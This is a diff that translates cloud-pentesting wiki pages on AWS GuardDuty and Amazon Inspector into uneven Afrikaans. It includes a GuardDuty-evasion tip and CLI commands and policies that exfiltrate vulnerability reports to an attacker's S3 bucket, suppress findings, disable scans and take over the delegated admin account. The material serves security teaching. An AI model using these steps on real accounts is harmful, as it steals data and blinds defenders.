+Die onttrekking van EC2 geloofsbriewe uit die metadata diens en **dit buite** die AWS-omgewing gebruik aktiveer die [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) waarskuwing. Omgekeerd, die gebruik van hierdie geloofsbriewe vanaf jou EC2 instance aktiveer die [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) waarskuwing. Tog, **die gebruik van die geloofsbriewe op 'n ander gecompromitteerde EC2 instance binne dieselfde rekening gaan ongemerk**, wat geen waarskuwing veroorsaak nie.
 
 > [!TIP]
-> Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert.
+> Daarom, **gebruik die onttrokken geloofsbriewe van binne die masjien** waar jy dit gevind het om nie hierdie waarskuwing te aktiveer nie.
 
-## References
+## Verwysings
 
 - [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)
 - [https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html)
@@ -191,7 +181,3 @@ Extracting EC2 credentials from the metadata service and **utilizing them outsid
 - [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
index 655b81fa7..bc2879a74 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md
@@ -6,53 +6,53 @@
 
 ### Inspector
 
-Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management.
+Amazon Inspector is 'n gevorderde, geoutomatiseerde kwesbaarheidbestuurdiens wat ontwerp is om die sekuriteit van jou AWS-omgewing te verbeter. Hierdie diens skandeer deurlopend Amazon EC2-instances, houerbeelde in Amazon ECR, Amazon ECS, en AWS Lambda-funksies vir kwesbaarhede en onbedoelde netwerkblootstelling. Deur 'n robuuste kwesbaarheidintelligensiedatabasis te benut, bied Amazon Inspector gedetailleerde bevindings, insluitend ernsvlakke en herstelaanbevelings, wat organisasies help om proaktief sekuriteitsrisiko's te identifiseer en aan te spreek. Hierdie omvattende benadering verseker 'n versterkte sekuriteitsposisie oor verskeie AWS-dienste, wat help met nakoming en risiko-bestuur.
 
 ### Key elements
 
 #### Findings
 
-Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as:
+Findings in Amazon Inspector is gedetailleerde verslae oor kwesbaarhede en blootstellings wat tydens die skandering van EC2-instances, ECR-bewaarplekke, of Lambda-funksies ontdek is. Gebaseer op sy toestand, word findings gekategoriseer as:
 
-- **Active**: The finding has not been remediated.
-- **Closed**: The finding has been remediated.
-- **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**.
+- **Aktief**: Die bevinding is nie herstel nie.
+- **Gesluit**: Die bevinding is herstel.
+- **Onderdruk**: Die bevinding is met hierdie toestand gemerk weens een of meer **onderdrukking reëls**.
 
-Findings are also categorized into the next three types:
+Findings word ook in die volgende drie tipes gekategoriseer:
 
-- **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues.
-- **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches.
-- **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups.
+- **Pakket**: Hierdie findings hou verband met kwesbaarhede in sagtewarepakkette wat op jou hulpbronne geïnstalleer is. Voorbeelde sluit verouderde biblioteke of afhanklikhede met bekende sekuriteitskwessies in.
+- **Kode**: Hierdie kategorie sluit kwesbaarhede in die kode van toepassings wat op jou AWS-hulpbronne loop in. Algemene probleme is koderingfoute of onveilige praktyke wat tot sekuriteitsbreuke kan lei.
+- **Netwerk**: Netwerk findings identifiseer potensiële blootstellings in netwerkkonfigurasies wat deur aanvallers uitgebuit kan word. Hierdie sluit oop poorte, onveilige netwerkprotokolle, en verkeerd geconfigureerde sekuriteitsgroepe in.
 
 #### Filters and Suppression Rules
 
-Filters and suppression rules in Amazon Inspector help manage and prioritize findings. Filters allow you to refine findings based on specific criteria, such as severity or resource type. Suppression rules allow you to suppress certain findings that are considered low risk, have already been mitigated, or for any other important reason, preventing them from overloading your security reports and allowing you to focus on more critical issues.
+Filters en onderdrukking reëls in Amazon Inspector help om findings te bestuur en te prioriseer. Filters laat jou toe om findings te verfyn op grond van spesifieke kriteria, soos erns of hulpbron tipe. Onderdrukking reëls laat jou toe om sekere findings wat as lae risiko beskou word, wat reeds gemitigeer is, of vir enige ander belangrike rede, te onderdruk, wat voorkom dat hulle jou sekuriteitsverslae oorlaai en jou toelaat om op meer kritieke kwessies te fokus.
 
 #### Software Bill of Materials (SBOM)
 
-A Software Bill of Materials (SBOM) in Amazon Inspector is an exportable nested inventory list detailing all the components within a software package, including libraries and dependencies. SBOMs help provide transparency into the software supply chain, enabling better vulnerability management and compliance. They are crucial for identifying and mitigating risks associated with open source and third-party software components.
+A Software Bill of Materials (SBOM) in Amazon Inspector is 'n uitvoerbare geneste inventarislis wat al die komponente binne 'n sagtewarepakket, insluitend biblioteke en afhanklikhede, in detail uiteensit. SBOMs help om deursigtigheid in die sagteware voorsieningsketting te bied, wat beter kwesbaarheidbestuur en nakoming moontlik maak. Hulle is van kardinale belang om risiko's wat verband hou met oopbron en derdeparty-sagtewarekomponente te identifiseer en te mitigeer.
 
 ### Key features
 
 #### Export findings
 
-Amazon Inspector offers the capability to export findings to Amazon S3 Buckets, Amazon EventBridge and AWS Security Hub, which enables you to generate detailed reports of identified vulnerabilities and exposures for further analysis or sharing at a specific date and time. This feature supports various output formats such as CSV and JSON, making it easier to integrate with other tools and systems. The export functionality allows customization of the data included in the reports, enabling you to filter findings based on specific criteria like severity, resource type, or date range and including by default all of your findings in the current AWS Region with an Active status.
+Amazon Inspector bied die vermoë om findings na Amazon S3 Buckets, Amazon EventBridge en AWS Security Hub te uitvoer, wat jou in staat stel om gedetailleerde verslae van geïdentifiseerde kwesbaarhede en blootstellings vir verdere analise of deel op 'n spesifieke datum en tyd te genereer. Hierdie kenmerk ondersteun verskeie uitvoerformate soos CSV en JSON, wat dit makliker maak om met ander gereedskap en stelsels te integreer. Die uitvoerfunksionaliteit laat aanpassing van die data wat in die verslae ingesluit is toe, wat jou in staat stel om findings te filter op grond van spesifieke kriteria soos erns, hulpbron tipe, of datumbereik en sluit standaard al jou findings in die huidige AWS Region met 'n Aktiewe status in.
 
-When exporting findings, a Key Management Service (KMS) key is necessary to encrypt the data during export. KMS keys ensure that the exported findings are protected against unauthorized access, providing an extra layer of security for sensitive vulnerability information.
+Wanneer findings uitgevoer word, is 'n Key Management Service (KMS) sleutel nodig om die data tydens uitvoer te enkripteer. KMS sleutels verseker dat die uitgevoerde findings teen ongemagtigde toegang beskerm word, wat 'n ekstra laag sekuriteit vir sensitiewe kwesbaarheidinligting bied.
 
 #### Amazon EC2 instances scanning
 
-Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account.
+Amazon Inspector bied robuuste skandeervermoëns vir Amazon EC2-instances om kwesbaarhede en sekuriteitskwessies te ontdek. Inspector het onttrokken metadata van die EC2-instance vergelyk met reëls van sekuriteitsadvies om pakketskwesbaarhede en netwerkbereikbaarheidkwessies te produseer. Hierdie skanderings kan uitgevoer word deur **agent-gebaseerde** of **agentlose** metodes, afhangende van die **skandeermodus** instellingskonfigurasie van jou rekening.
 
-- **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance.
-- **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning.
+- **Agent-GeBASEER**: Gebruik die AWS Systems Manager (SSM) agent om diepgaande skanderings uit te voer. Hierdie metode laat vir omvattende dataversameling en -analise direk vanaf die instance toe.
+- **Agentlose**: Bied 'n liggewig alternatief wat nie die installering van 'n agent op die instance vereis nie, deur 'n EBS-snapshots van elke volume van die EC2-instance te skep, op soek na kwesbaarhede, en dit dan te verwyder; benut bestaande AWS-infrastruktuur vir skandering.
 
-The scan mode determines which method will be used to perform EC2 scans:
+Die skandeermodus bepaal watter metode gebruik sal word om EC2-skanderings uit te voer:
 
-- **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection.
-- **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless.
+- **Agent-GeBASEER**: Betrek die installering van die SSM-agent op EC2-instances vir diep inspeksie.
+- **Hibrid Skandering**: Kombineer beide agent-gebaseerde en agentlose metodes om dekking te maksimeer en prestasie-impak te minimaliseer. In daardie EC2-instances waar die SSM-agent geïnstalleer is, sal Inspector 'n agent-gebaseerde skandering uitvoer, en vir diegene waar daar geen SSM-agent is nie, sal die skandering agentloos wees.
 
-Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10:
+Nog 'n belangrike kenmerk is die **diep inspeksie** vir EC2 Linux-instances. Hierdie kenmerk bied deeglike analise van die sagteware en konfigurasie van EC2 Linux-instances, wat gedetailleerde kwesbaarheidbeoordelings bied, insluitend bedryfstelsels kwesbaarhede, toepassings kwesbaarhede, en verkeerd konfigureerde instellings, wat 'n omvattende sekuriteitsbeoordeling verseker. Dit word bereik deur die inspeksie van **aangepaste paaie** en al sy sub-gidse. Standaard sal Amazon Inspector die volgende skandeer, maar elke lidrekening kan tot 5 meer aangepaste paaie definieer, en elke gedelegeerde administrateur tot 10:
 
 - `/usr/lib`
 - `/usr/lib64`
@@ -61,28 +61,27 @@ Another important feature is the **deep inspection** for EC2 Linux instances. Th
 
 #### Amazon ECR container images scanning
 
-Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently.
+Amazon Inspector bied robuuste skandeervermoëns vir Amazon Elastic Container Registry (ECR) houerbeelde, wat verseker dat pakketskwesbaarhede doeltreffend ontdek en bestuur word.
 
-- **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans.
-- **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues.
+- **Basiese Skandering**: Dit is 'n vinnige en liggewig skandering wat bekende OS-pakketskwesbaarhede in houerbeelde identifiseer met behulp van 'n standaard stel reëls van die oopbron Clair-projek. Met hierdie skandeer konfigurasie, sal jou bewaringe geskanteer word op druk, of deur handmatige skanderings uit te voer.
+- **Verbeterde Skandering**: Hierdie opsie voeg die deurlopende skandeerfunksie by, benewens die op druk skandering. Verbeterde skandering delf dieper in die lae van elke houerbeeld om kwesbaarhede in OS-pakkette en in programmeringstaal pakkette met hoër akkuraatheid te identifiseer. Dit analiseer beide die basisbeeld en enige addisionele lae, wat 'n omvattende oorsig van potensiële sekuriteitskwessies bied.
 
 #### Amazon Lambda functions scanning
 
-Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions:
+Amazon Inspector sluit omvattende skandeervermoëns vir AWS Lambda-funksies en sy lae in, wat die sekuriteit en integriteit van serverless toepassings verseker. Inspector bied twee tipes skandering vir Lambda-funksies:
 
-- **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding.
-- **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues.
+- **Lambda standaard skandering**: Hierdie standaard kenmerk identifiseer sagtewarekwesbaarhede in die toepassingspakket afhanklikhede wat by jou Lambda-funksie en lae gevoeg is. Byvoorbeeld, as jou funksie 'n weergawe van 'n biblioteek soos python-jwt met 'n bekende kwesbaarheid gebruik, genereer dit 'n bevinding.
+- **Lambda kode skandering**: Analiseer aangepaste toepassingskode vir sekuriteitskwessies, wat kwesbaarhede soos inspuitingsfoute, datalekke, swak kriptografie, en ontbrekende enkripsie opspoor. Dit vang kode-snippets wat gedetecteerde kwesbaarhede uitlig, soos hardgecodeerde akrediteer. Findings sluit gedetailleerde herstelvoorstelle en kode-snippets vir die regstelling van die kwessies in.
 
 #### **Center for Internet Security (CIS) scans**
 
-Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines.
+Amazon Inspector sluit CIS-skanderings in om Amazon EC2-instance bedryfstelsels teen beste praktyk aanbevelings van die Center for Internet Security (CIS) te benchmark. Hierdie skanderings verseker dat konfigurasies aan industrie-standaard sekuriteitsbaselines voldoen.
 
-- **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title.
-- **Execution**: Scans are performed or scheduled based on instance tags and defined schedules.
-- **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance.
+- **Konfigurasie**: CIS-skanderings evalueer of stelsels se konfigurasies aan spesifieke CIS Benchmark aanbevelings voldoen, met elke kontrole wat aan 'n CIS kontrole-ID en titel gekoppel is.
+- **Uitvoering**: Skanderings word uitgevoer of geskeduleer op grond van instance-tags en gedefinieerde skedules.
+- **Resultate**: Post-skanresultate dui aan watter kontroles geslaag het, oorgeslaan is, of gefaal het, wat insig bied in die sekuriteitsposisie van elke instance.
 
 ### Enumeration
-
 ```bash
 # Administrator and member accounts #
 
@@ -111,7 +110,7 @@ aws inspector2 list-findings
 aws inspector2 batch-get-finding-details --finding-arns <value>
 ## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this)
 aws inspector2 list-finding-aggregations --aggregation-type <FINDING_TYPE | PACKAGE | TITLE | REPOSITORY | AMI | AWS_EC2_INSTANCE | AWS_ECR_CONTAINER | IMAGE_LAYER\
- | ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
+| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids <value>]
 ## Retrieve code snippet information about one or more specified code vulnerability findings
 aws inspector2 batch-get-code-snippet --finding-arns <value>
 ## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this)
@@ -183,113 +182,99 @@ aws inspector list-exclusions --assessment-run-arn <arn>
 ## Rule packages
 aws inspector list-rules-packages
 ```
-
 ### Post Exploitation
 
 > [!TIP]
-> From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers.
+> Vanuit 'n aanvaller se perspektief kan hierdie diens die aanvaller help om kwesbaarhede en netwerkblootstellings te vind wat hom kan help om ander instansies/tenks te kompromitteer.
 >
-> However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones).
+> egter, 'n aanvaller kan ook belangstel om hierdie diens te ontwrig sodat die slagoffer nie kwesbaarhede kan sien nie (alle of spesifieke).
 
 #### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport`
 
-An attacker could generate detailed reports of vulnerabilities or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. This information could be exploited to identify specific weaknesses, outdated software, or insecure dependencies, enabling targeted attacks.
-
+'n Aanvaller kan gedetailleerde verslae van kwesbaarhede of sagteware-bill of materials (SBOMs) genereer en dit uit jou AWS-omgewing uitvoer. Hierdie inligting kan benut word om spesifieke swakpunte, verouderde sagteware of onveilige afhanklikhede te identifiseer, wat gerigte aanvalle moontlik maak.
 ```bash
 # Findings report
 aws inspector2 create-findings-report --report-format <CSV | JSON> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--filter-criteria <value>]
 # SBOM report
 aws inspector2 create-sbom-report --report-format <CYCLONEDX_1_4 | SPDX_2_3> --s3-destination <bucketName=string,keyPrefix=string,kmsKeyArn=string> [--resource-filter-criteria <value>]
 ```
-
-The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key:
-
-1. **Create an Amazon S3 Bucket** and attach a policy to it in order to be accessible from the victim Amazon Inspector:
-
+1. **Skep 'n Amazon S3-bucket** en heg 'n beleid daaraan sodat dit toeganklik is vanaf die slagoffer se Amazon Inspector:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Sid": "allow-inspector",
-      "Effect": "Allow",
-      "Principal": {
-        "Service": "inspector2.amazonaws.com"
-      },
-      "Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"],
-      "Resource": "arn:aws:s3:::inspector-findings/*",
-      "Condition": {
-        "StringEquals": {
-          "aws:SourceAccount": "<victim-account-id>"
-        },
-        "ArnLike": {
-          "aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
-        }
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "allow-inspector",
+"Effect": "Allow",
+"Principal": {
+"Service": "inspector2.amazonaws.com"
+},
+"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"],
+"Resource": "arn:aws:s3:::inspector-findings/*",
+"Condition": {
+"StringEquals": {
+"aws:SourceAccount": "<victim-account-id>"
+},
+"ArnLike": {
+"aws:SourceArn": "arn:aws:inspector2:us-east-1:<victim-account-id>:report/*"
+}
+}
+}
+]
 }
 ```
-
-2. **Create an Amazon KMS key** and attach a policy to it in order to be usable by the victim’s Amazon Inspector:
-
+2. **Skep 'n Amazon KMS-sleutel** en heg 'n beleid daaraan sodat dit deur die slagoffer se Amazon Inspector gebruik kan word:
 ```json
 {
-    "Version": "2012-10-17",
-    "Id": "key-policy",
-    "Statement": [
-        {
-	    ...
-        },
-        {
-            "Sid": "Allow victim Amazon Inspector to use the key",
-            "Effect": "Allow",
-            "Principal": {
-                "Service": "inspector2.amazonaws.com"
-            },
-            "Action": [
-                "kms:Encrypt",
-                "kms:Decrypt",
-                "kms:ReEncrypt*",
-                "kms:GenerateDataKey*",
-                "kms:DescribeKey"
-            ],
-            "Resource": "*",
-            "Condition": {
-                "StringEquals": {
-                    "aws:SourceAccount": "<victim-account-id>"
-                }
-            }
-        }
-    ]
+"Version": "2012-10-17",
+"Id": "key-policy",
+"Statement": [
+{
+...
+},
+{
+"Sid": "Allow victim Amazon Inspector to use the key",
+"Effect": "Allow",
+"Principal": {
+"Service": "inspector2.amazonaws.com"
+},
+"Action": [
+"kms:Encrypt",
+"kms:Decrypt",
+"kms:ReEncrypt*",
+"kms:GenerateDataKey*",
+"kms:DescribeKey"
+],
+"Resource": "*",
+"Condition": {
+"StringEquals": {
+"aws:SourceAccount": "<victim-account-id>"
+}
+}
+}
+]
 }
 ```
-
-3. Execute the command to **create the findings report** exfiltrating it:
-
+3. Voer die opdrag uit om **die bevindingsverslag te skep** deur dit te eksfiltreer:
 ```bash
 aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=<attacker-bucket-name>,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f
 ```
-
-- **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses.
+- **Potensiële Impak**: Generasie en eksfiltrasie van gedetailleerde kwesbaarheid en sagteware verslae, insig verkry in spesifieke kwesbaarhede en sekuriteits swakhede.
 
 #### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport`
 
-An attacker could cancel the generation of the specified findings report or SBOM report, preventing security teams from receiving timely information about vulnerabilities and software bill of materials (SBOMs), delaying the detection and remediation of security issues.
-
+'n Aanvaller kan die generasie van die gespesifiseerde bevindingsverslag of SBOM-verslag kanselleer, wat verhoed dat sekuriteitspanne tydige inligting oor kwesbaarhede en sagteware-bill of materials (SBOMs) ontvang, wat die opsporing en herstel van sekuriteitskwessies vertraag.
 ```bash
 # Cancel findings report generation
 aws inspector2 cancel-findings-report --report-id <value>
 # Cancel SBOM report generatiom
 aws inspector2 cancel-sbom-export --report-id <value>
 ```
-
-- **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues.
+- **Potensiële Impak**: Ontwrichting van sekuriteitsmonitering en voorkoming van tydige opsporing en herstel van sekuriteitskwessies.
 
 #### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter`
 
-An attacker with these permissions would be able manipulate the filtering rules that determine which vulnerabilities and security issues are reported or suppressed (if the **action** is set to SUPPRESS, a suppression rule would be created). This could hide critical vulnerabilities from security administrators, making it easier to exploit these weaknesses without detection. By altering or removing important filters, an attacker could also create noise by flooding the system with irrelevant findings, hindering effective security monitoring and response.
-
+'n Aanvaller met hierdie toestemmings sou in staat wees om die filterreëls te manipuleer wat bepaal watter kwesbaarhede en sekuriteitskwessies gerapporteer of onderdruk word (as die **aksie** op SUPPRESS gestel is, sou 'n onderdrukkingsreël geskep word). Dit kan kritieke kwesbaarhede van sekuriteitsadministrateurs verberg, wat dit makliker maak om hierdie swakhede sonder opsporing te benut. Deur belangrike filters te verander of te verwyder, kan 'n aanvaller ook geraas skep deur die stelsel met irrelevante bevindings te oorstroom, wat effektiewe sekuriteitsmonitering en -reaksie belemmer.
 ```bash
 # Create
 aws inspector2 create-filter --action <NONE | SUPPRESS> --filter-criteria <value> --name <value> [--reason <value>]
@@ -298,93 +283,78 @@ aws inspector2 update-filter --filter-arn <value> [--action <NONE | SUPPRESS>] [
 # Delete
 aws inspector2 delete-filter --arn <value>
 ```
-
-- **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings.
+- **Potensiële Impak**: Verborge of onderdrukking van kritieke kwesbaarhede, of oorstroming van die stelsel met irrelevante bevindings.
 
 #### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`)
 
-An attacker could significantly disrupt the security management structure.
+'n Aanvaller kan die sekuriteitsbestuursstruktuur aansienlik ontwrig.
 
-- Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports.
-- Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities.
+- Deur die gedelegeerde administrateurrekening te deaktiveer, kan die aanvaller die sekuriteitspan verhinder om toegang te verkry tot en die Amazon Inspector-instellings en -verslae te bestuur.
+- Deur 'n ongeoorloofde administrateurrekening te aktiveer, kan 'n aanvaller sekuriteitskonfigurasies beheer, wat moontlik skandeer kan deaktiveer of instellings kan wysig om kwaadwillige aktiwiteite te verberg.
 
 > [!WARNING]
-> It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator.
+> Dit is vereis dat die ongeoorloofde rekening in dieselfde Organisasie as die slagoffer is om die gedelegeerde administrateur te word.
 >
-> In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`**
-
+> Ten einde vir die ongeoorloofde rekening om die gedelegeerde administrateur te word, is dit ook vereis dat nadat die wettige gedelegeerde administrateur gedeaktiveer is, en voordat die ongeoorloofde rekening as die gedelegeerde administrateur geaktiveer word, die wettige administrateur van die organisasie as die gedelegeerde administrateur gederegistreer moet word. Dit kan gedoen word met die volgende opdrag (**`organizations:DeregisterDelegatedAdministrator`** toestemming vereis): **`aws organizations deregister-delegated-administrator --account-id <legit-account-id> --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`**
 ```bash
 # Disable
 aws inspector2 disable-delegated-admin-account --delegated-admin-account-id <value>
 # Enable
 aws inspector2 enable-delegated-admin-account --delegated-admin-account-id <value>
 ```
-
-- **Potential Impact**: Disruption of the security management.
+- **Potensiële Impak**: Ontwrichting van die sekuriteitsbestuur.
 
 #### `inspector2:AssociateMember`, `inspector2:DisassociateMember`
 
-An attacker could manipulate the association of member accounts within an Amazon Inspector organization. By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection.
+'n Aanvaller kan die assosiasie van lid rekeninge binne 'n Amazon Inspector-organisasie manipuleer. Deur ongeoorloofde rekeninge te assosieer of legitieme ones te disassosieer, kan 'n aanvaller beheer oor watter rekeninge ingesluit word in sekuriteitskanderings en verslagdoening. Dit kan lei tot kritieke rekeninge wat uitgesluit word van sekuriteitsmonitering, wat die aanvaller in staat stel om kwesbaarhede in daardie rekeninge te benut sonder opsporing.
 
 > [!WARNING]
-> This action requires to be performed by the delegated administrator.
-
+> Hierdie aksie vereis dat dit deur die gedelegeerde administrateur uitgevoer word.
 ```bash
 # Associate
 aws inspector2 associate-member --account-id <value>
 # Disassociate
 aws inspector2 disassociate-member --account-id <value>
 ```
-
-- **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities.
+- **Potensiële Impak**: Uitsluiting van sleutelrekeninge uit sekuriteitsskande, wat onopgemerkte uitbuiting van kwesbaarhede moontlik maak.
 
 #### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`)
 
-An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations.
+'n Aanvaller met die `inspector2:Disable` toestemming sou in staat wees om sekuriteitsskande op spesifieke hulpbron tipes (EC2, ECR, Lambda, Lambda kode) oor die gespesifiseerde rekeninge te deaktiveer, wat dele van die AWS omgewing onbeheerd en kwesbaar vir aanvalle laat. Daarbenewens, as gevolg van die **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** toestemmings, kan 'n aanvaller dan selektief skande heraktiveer om opsporing van verdagte konfigurasies te vermy.
 
 > [!WARNING]
-> This action requires to be performed by the delegated administrator.
-
+> Hierdie aksie moet deur die gedelegeerde administrateur uitgevoer word.
 ```bash
 # Disable
 aws inspector2 disable --account-ids <value> [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>]
 # Enable
 aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids <value>]
 ```
-
-- **Potential Impact**: Creation of blind spots in the security monitoring.
+- **Potensiële Impak**: Skepping van blinde kolle in die sekuriteitsmonitering.
 
 #### `inspector2:UpdateOrganizationConfiguration`
 
-An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts.
+'n Aanvaller met hierdie toestemming sal in staat wees om die konfigurasies vir jou Amazon Inspector-organisasie op te dateer, wat die standaard skandeerfunksies wat vir nuwe lid rekeninge geaktiveer is, beïnvloed.
 
 > [!WARNING]
-> This action requires to be performed by the delegated administrator.
-
+> Hierdie aksie moet deur die gedelegeerde administrateur uitgevoer word.
 ```bash
 aws inspector2 update-organization-configuration --auto-enable <ec2=true|false,ecr=true|false,lambda=true|false,lambdaCode=true|false>
 ```
-
-- **Potential Impact**: Alter security scan policies and configurations for the organization.
+- **Potensiële Impak**: Verander sekuriteitskande-beleide en konfigurasies vir die organisasie.
 
